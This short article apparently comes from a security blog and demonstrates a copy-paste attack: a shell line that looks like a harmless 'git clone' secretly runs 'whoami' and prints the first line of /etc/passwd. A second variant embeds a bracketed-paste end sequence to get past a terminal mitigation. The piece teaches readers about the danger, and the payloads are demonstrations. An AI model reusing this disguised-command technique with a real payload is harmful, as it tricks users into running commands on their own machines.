You surely know this: You're looking at some website with some useful shell commands. However, those commands are long as hell and you know you're probably not gonna need them for a few years or so (so there's no need to memorize them). So, what do you do? You copy-paste them. Here's an example:

git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!
Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
git clone
git://git.kernel.org/pub/scm/utils/kup/kup.git

Try running this command in your terminal. It's supposed to be harmless, right? It is harmless, yes, but what happens still isn't what you'd expect and demonstrates the dangers in doing stuff like that. Mark it with your mouse, copy it somehow (e.g. using CTRL+C) and paste it into a terminal. What happens?

There are some good comments and suggestions on how you can mitigate this kind of attack on reddit and Hacker News. Also, oh-my-zsh now includes a fix for this issue (which relies on Bracketed Paste Mode support in the terminal). Oh, and it seems that other people wrote a detailed text about this issue in 2008.

Please note that Bracketed Paste Mode DOES NOT fix this because the end sequence can be inside the text you paste! For those of you who have installed the oh-my-zsh stuff, sorry, but the following variant (which includes an escape sequence) still works against you:

git clone [201~/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!
Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
git clone
git://git.kernel.org/pub/scm/utils/kup/kup.git